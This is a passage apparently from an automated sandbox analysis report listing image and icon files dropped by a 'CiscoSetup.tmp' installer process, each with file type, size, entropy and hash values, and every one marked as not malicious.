                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                                                                                  MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                                                                                  SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                                                                                  SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                                                                                  SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                                                                                  MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                                                                                  SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                                                                                  SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                                                                                  SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
